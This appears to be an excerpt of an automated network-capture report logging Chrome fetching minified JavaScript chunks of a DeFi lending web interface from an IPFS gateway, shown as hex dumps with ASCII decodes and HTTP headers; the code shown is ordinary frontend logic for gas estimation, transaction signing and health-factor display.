                                                                                                                                                                                                                                                  Data Ascii: S=r(31001),I=function(e){var t=(0,O.Y)((function(e){return e.jsonRpcProvider}));return(0,P.h)({queries:e.map((function(e){return{queryKey:S.B.gasPrices(e),queryFn:function(){return t(e).getFeeData().then((function(e){return function(e){var t,r,n,a,i={lega
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6e 69 74 73 29 28 72 2c 22 67 77 65 69 22 29 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 5b 74 5d 2e 6c 65 67 61 63 79 47 61 73 50 72 69 63 65 3b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 28 30 2c 75 2e 66 6f 72 6d 61 74 55 6e 69 74 73 29 28 65 2e 6d 75 6c 28 69 29 2c 31 38 29 29 2a 70 61 72 73 65 46 6c 6f 61 74 28 61 29 7d 28 72 2c 78 2e 67 61 73 4f 70 74 69 6f 6e 2c 78 2e 63 75 73 74 6f 6d 47 61 73 2c 45 2c 28 30 2c 61 2e 46 76 29 28 6e 75 6c 6c 3d 3d 3d 53 7c 7c 76 6f 69 64 20 30 3d 3d 3d 53 3f 76 6f 69 64 20 30 3a 53 2e 62 61 73 65 43 75 72 72 65 6e 63 79 44 61 74 61 2e 6e 65 74 77 6f 72 6b 42 61 73 65 54 6f 6b 65 6e 50 72 69 63 65 49 6e 55 73 64 2c 6e 75 6c 6c 3d 3d 3d 53 7c 7c 76 6f 69 64 20 30 3d 3d 3d 53 3f 76 6f 69 64 20 30 3a 53 2e 62 61 73 65 43 75
                                                                                                                                                                                                                                                  Data Ascii: nits)(r,"gwei").toString():n[t].legacyGasPrice;return Number((0,u.formatUnits)(e.mul(i),18))*parseFloat(a)}(r,x.gasOption,x.customGas,E,(0,a.Fv)(null===S||void 0===S?void 0:S.baseCurrencyData.networkBaseTokenPriceInUsd,null===S||void 0===S?void 0:S.baseCu
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 21 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 7c 7c 28 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 79 28 65 2c 74 29 3b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 22 4f 62 6a 65 63 74 22 3d 3d 3d 72 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 72 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 3b 69 66 28 22 4d 61 70 22 3d 3d 3d 72 7c 7c 22 53 65 74 22
                                                                                                                                                                                                                                                  Data Ascii: &e[Symbol.iterator]||e["@@iterator"];if(!r){if(Array.isArray(e)||(r=function(e,t){if(!e)return;if("string"===typeof e)return y(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 6a 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 54 3d 22 53 69 67 6e 65 64 20 63 6f 72 72 65 63 74 6c 79 22 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65
                                                                                                                                                                                                                                                  Data Ascii: )):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):j(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var T="Signed correctly",A=function(e){var t=e
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 74 2e 74 78 2c 6e 3d 74 2e 65 72 72 6f 72 43 61 6c 6c 62 61 63 6b 2c 61 3d 74 2e 73 75 63 63 65 73 73 43 61 6c 6c 62 61 63 6b 2c 69 3d 74 2e 61 70 70 72 6f 76 61 6c 2c 65 2e 70 72 65 76 3d 31 2c 65 2e 6e 65 78 74 3d 34 2c 72 28 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 73 3d 65 2e 73 65 6e 74 2c 65 2e 70 72 65 76 3d 35 2c 65 2e 6e 65 78 74 3d 38 2c 73 2e 77 61 69 74 28 31 29 3b 63 61 73 65 20 38 3a 70 65 2e 63 75 72 72 65 6e 74 26 26 61 26 26 61 28 73 29 2c 65 65 28 73 2e 68 61 73 68 2c 43 28 7b 74 78 53 74 61 74 65 3a 22 73 75 63 63 65 73 73 22 2c 61 63 74 69 6f 6e 3a 69 3f 75 2e 55 51 2e 61 70 70 72 6f 76 61 6c 3a 6e 75 6c 6c 21 3d 3d 41 26 26 76 6f 69 64 20 30 21 3d 3d 41 3f 41 3a 75 2e 55 51 2e 64 65 66 61 75 6c 74 7d 2c 6b 29 29 2c 7a 2e 69 6e
                                                                                                                                                                                                                                                  Data Ascii: t.tx,n=t.errorCallback,a=t.successCallback,i=t.approval,e.prev=1,e.next=4,r();case 4:return s=e.sent,e.prev=5,e.next=8,s.wait(1);case 8:pe.current&&a&&a(s),ee(s.hash,C({txState:"success",action:i?u.UQ.approval:null!==A&&void 0!==A?A:u.UQ.default},k)),z.in
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 4d 49 47 52 41 54 4f 52 5f 56 33 22 3d 3d 3d 6f 2e 70 65 72 6d 69 74 54 79 70 65 3f 6e 2e 70 75 73 68 28 58 28 43 28 43 28 7b 7d 2c 6f 29 2c 7b 7d 2c 7b 64 65 61 64 6c 69 6e 65 3a 72 7d 29 29 29 3a 22 42 4f 52 52 4f 57 5f 4d 49 47 52 41 54 4f 52 5f 56 33 22 3d 3d 3d 6f 2e 70 65 72 6d 69 74 54 79 70 65 3f 6e 2e 70 75 73 68 28 24 28 43 28 43 28 7b 7d 2c 6f 29 2c 7b 7d 2c 7b 64 65 61 64 6c 69 6e 65 3a 72 2c 73 70 65 6e 64 65 72 3a 72 65 2e 61 64 64 72 65 73 73 65 73 2e 56 33 5f 4d 49 47 52 41 54 4f 52 7c 7c 22 22 7d 29 29 29 3a 22 53 54 41 4b 45 22 3d 3d 3d 6f 2e 70 65 72 6d 69 74 54 79 70 65 26 26 6e 2e 70 75 73 68 28 74 65 28 7b 74 6f 6b 65 6e 3a 6f 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 61 6d 6f 75 6e 74 3a 6f 2e 61 6d 6f 75 6e 74 2c 64 65 61
                                                                                                                                                                                                                                                  Data Ascii: MIGRATOR_V3"===o.permitType?n.push(X(C(C({},o),{},{deadline:r}))):"BORROW_MIGRATOR_V3"===o.permitType?n.push($(C(C({},o),{},{deadline:r,spender:re.addresses.V3_MIGRATOR||""}))):"STAKE"===o.permitType&&n.push(te({token:o.underlyingAsset,amount:o.amount,dea
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 33 3a 72 65 74 75 72 6e 20 68 3d 65 2e 73 65 6e 74 2c 65 2e 6e 65 78 74 3d 36 36 2c 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 68 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 28 30 2c 69 2e 5a 29 28 63 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 74 28 72 2c 6e 29 7b 72 65 74 75 72 6e 20 63 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 74 2e 70 72 65 76 3d 74 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 64 65 6c 65 74 65 20 65 2e 67 61 73 50 72 69 63 65 2c 66 65 28 7b 74 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 28 65 29 7d 2c 73 75 63 63 65 73 73 43 61 6c 6c 62
                                                                                                                                                                                                                                                  Data Ascii: 3:return h=e.sent,e.next=66,Promise.all(h.map((function(e){return new Promise(function(){var t=(0,i.Z)(c().mark((function t(r,n){return c().wrap((function(t){for(;;)switch(t.prev=t.next){case 0:delete e.gasPrice,fe({tx:function(){return U(e)},successCallb
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 75 63 63 65 73 73 3a 21 30 7d 29 2c 4d 28 76 6f 69 64 20 30 29 7d 2c 65 72 72 6f 72 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 28 30 2c 62 2e 57 47 29 28 65 2c 62 2e 61 44 2e 4d 41 49 4e 5f 41 43 54 49 4f 4e 29 3b 4d 28 72 29 2c 47 28 7b 74 78 48 61 73 68 3a 74 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 7d 7d 29 29 3b 63 61 73 65 20 31 35 3a 65 2e 70 72 65 76 3d 31 35 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 33 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 2e 74 30 2c 22 65 72 72 6f 72 22 29 2c 61 3d 28 30 2c 62 2e 57 47 29 28 65 2e 74 30 2c 62 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 4d 28 61 29 2c 47 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29
                                                                                                                                                                                                                                                  Data Ascii: success:!0}),M(void 0)},errorCallback:function(e,t){var r=(0,b.WG)(e,b.aD.MAIN_ACTION);M(r),G({txHash:t,loading:!1})}}));case 15:e.prev=15,e.t0=e.catch(3),console.log(e.t0,"error"),a=(0,b.WG)(e.t0,b.aD.GAS_ESTIMATION,!1),M(a),G({txHash:void 0,loading:!1})


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  61192.168.2.549777209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/1573-73b9595d97d74de8.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 14192
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifxa7pp5makjhtm4fztcen6pvq6nqmjzv2kbatfdvehnsnfxlrihe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1573-73b9595d97d74de8.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifxa7pp5makjhtm4fztcen6pvq6nqmjzv2kbatfdvehnsnfxlrihe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98748
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 37 61 63 31 61 37 64 30 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e427ac1a7d00-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 35 37 33 5d 2c 7b 35 37 38 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 72 2e 64 28 6e 2c 7b 6d 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 2c 6f 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 7d 2c 58 4a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 42 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 4a 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 61 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 2c 6a 7a 3a 66 75
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1573],{57824:function(e,n,r){r.d(n,{m6:function(){return I},oD:function(){return D},XJ:function(){return C},Bx:function(){return T},JV:function(){return S},aE:function(){return w},jz:fu
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 67 61 73 4c 69 6d 69 74 2c 72 3d 65 2e 73 6c 69 70 70 61 67 65 53 65 6c 65 63 74 6f 72 2c 74 3d 65 2e 73 6b 69 70 4c 6f 61 64 2c 69 3d 65 2e 64 69 73 61 62 6c 65 64 2c 6f 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 73 3d 65 2e 63 68 61 69 6e 49 64 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 73 29 28 63 2e 5a 2c 7b 73 78 3a 7b 70 74 3a 35 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 4f 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 7d 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 54 72 61 6e 73 61 63 74 69 6f 6e 20 6f 76 65 72 76 69 65 77 22 7d 29 7d 29 2c 28 30 2c 4f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                  Data Ascii: .gasLimit,r=e.slippageSelector,t=e.skipLoad,i=e.disabled,o=e.children,s=e.chainId;return(0,O.jsxs)(c.Z,{sx:{pt:5},children:[(0,O.jsx)(l.Z,{sx:{mb:1},color:"text.secondary",children:(0,O.jsx)(a.cC,{id:"Transaction overview"})}),(0,O.jsx)(c.Z,{sx:function(e
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 67 2c 6a 3d 76 6f 69 64 20 30 21 3d 3d 70 26 26 70 3b 72 65 74 75 72 6e 28 30 2c 4f 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 6e 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 65 6e 64 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 6a 3f 28 30 2c 4f 2e 6a 73 78 73 29 28 4f 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 4f 2e 6a 73 78 29 28 64 2e 5a 2c 7b 76 61 72 69 61
                                                                                                                                                                                                                                                  Data Ascii: g,j=void 0!==p&&p;return(0,O.jsx)(h.X,{caption:n,captionVariant:"description",mb:4,align:"flex-start",children:(0,O.jsx)(c.Z,{sx:{display:"flex",flexDirection:"column",alignItems:"flex-end"},children:j?(0,O.jsxs)(O.Fragment,{children:[(0,O.jsx)(d.Z,{varia
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 6e 3d 7b 7d 2c 28 30 2c 74 2e 5a 29 28 6e 2c 76 2e 7a 2e 45 4e 41 42 4c 45 44 2c 28 30 2c 4f 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f 72 3a 22 73 75 63 63 65 73 73 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 45 6e 61 62 6c 65 64 22 7d 29 7d 29 29 2c 28 30 2c 74 2e 5a 29 28 6e 2c 76 2e 7a 2e 49 53 4f 4c 41 54 45 44 5f 45 4e 41 42 4c 45 44 2c 28 30 2c 4f 2e 6a 73 78 29 28 6a 2e 43 68 2c 7b 74 79 70 6f 67 72 61 70 68 79 50 72 6f 70 73 3a 7b 76 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 63 6f 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: flex",alignItems:"center"},children:(n={},(0,t.Z)(n,v.z.ENABLED,(0,O.jsx)(l.Z,{variant:"description",color:"success.main",children:(0,O.jsx)(a.cC,{id:"Enabled"})})),(0,t.Z)(n,v.z.ISOLATED_ENABLED,(0,O.jsx)(j.Ch,{typographyProps:{variant:"description",colo
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 7b 76 61 72 20 6e 3d 65 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 2c 72 3d 65 2e 66 75 74 75 72 65 48 65 61 6c 74 68 46 61 63 74 6f 72 2c 74 3d 65 2e 76 69 73 69 62 6c 65 48 66 43 68 61 6e 67 65 2c 69 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6f 3d 76 6f 69 64 20 30 21 3d 3d 69 26 26 69 3b 72 65 74 75 72 6e 22 2d 31 22 3d 3d 3d 6e 26 26 22 2d 31 22 3d 3d 3d 72 3f 6e 75 6c 6c 3a 28 30 2c 4f 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 4f 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 48 65 61 6c 74 68 20 66 61 63 74 6f 72 22 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 4f 2e 6a 73 78 73 29
                                                                                                                                                                                                                                                  Data Ascii: {var n=e.healthFactor,r=e.futureHealthFactor,t=e.visibleHfChange,i=e.loading,o=void 0!==i&&i;return"-1"===n&&"-1"===r?null:(0,O.jsx)(h.X,{caption:(0,O.jsx)(a.cC,{id:"Health factor"}),captionVariant:"description",mb:4,align:"flex-start",children:(0,O.jsxs)
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 74 3d 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 74 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                  Data Ascii: wnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function g(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 7d 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 70 72 6f 76 65 42 75 74 74 6f 6e 43 68 61 6e 67 65 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6d 2e 6a 73 78 29 28 78 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 32 22 2c 63 6f 6c 6f 72 3a 22 69 6e 66 6f 2e 6d 61 69 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 7b 63 75 72 72 65 6e 74 4d 65 74 68 6f 64 7d 22 2c 76 61 6c 75 65 73 3a 7b 63 75 72 72 65 6e 74 4d 65 74 68 6f 64 3a 6e 7d 7d 29 7d 29 2c 28 30 2c 6d 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 31 36 2c 6d 6c 3a 31
                                                                                                                                                                                                                                                  Data Ascii: lay:"flex",alignItems:"center",cursor:"pointer"},"data-cy":"approveButtonChange",children:[(0,m.jsx)(x.Z,{variant:"subheader2",color:"info.main",children:(0,m.jsx)(a.cC,{id:"{currentMethod}",values:{currentMethod:n}})}),(0,m.jsx)(s.Z,{sx:{fontSize:16,ml:1
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 76 61 72 20 6e 3d 65 2e 61 70 70 72 6f 76 61 6c 48 61 73 68 2c 72 3d 65 2e 74 72 79 50 65 72 6d 69 74 2c 74 3d 28 30 2c 4e 2e 59 29 28 29 2c 69 3d 74 2e 77 61 6c 6c 65 74 41 70 70 72 6f 76 61 6c 4d 65 74 68 6f 64 50 72 65 66 65 72 65 6e 63 65 2c 6f 3d 74 2e 73 65 74 57 61 6c 6c 65 74 41 70 70 72 6f 76 61 6c 4d 65 74 68 6f 64 50 72 65 66 65 72 65 6e 63 65 2c 73 3d 72 26 26 69 2c 6c 3d 28 30 2c 6b 2e 66 29 28 29 2e 63 75 72 72 65 6e 74 4e 65 74 77 6f 72 6b 43 6f 6e 66 69 67 2c 64 3d 6e 3d 3d 3d 42 2e 5a 3b 72 65 74 75 72 6e 20 6e 7c 7c 64 7c 7c 21 72 3f 6e 26 26 21 73 3f 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 61
                                                                                                                                                                                                                                                  Data Ascii: var n=e.approvalHash,r=e.tryPermit,t=(0,N.Y)(),i=t.walletApprovalMethodPreference,o=t.setWalletApprovalMethodPreference,s=r&&i,l=(0,k.f)().currentNetworkConfig,d=n===B.Z;return n||d||!r?n&&!s?(0,m.jsx)(c.Z,{sx:{display:"flex",justifyContent:"flex-start",a
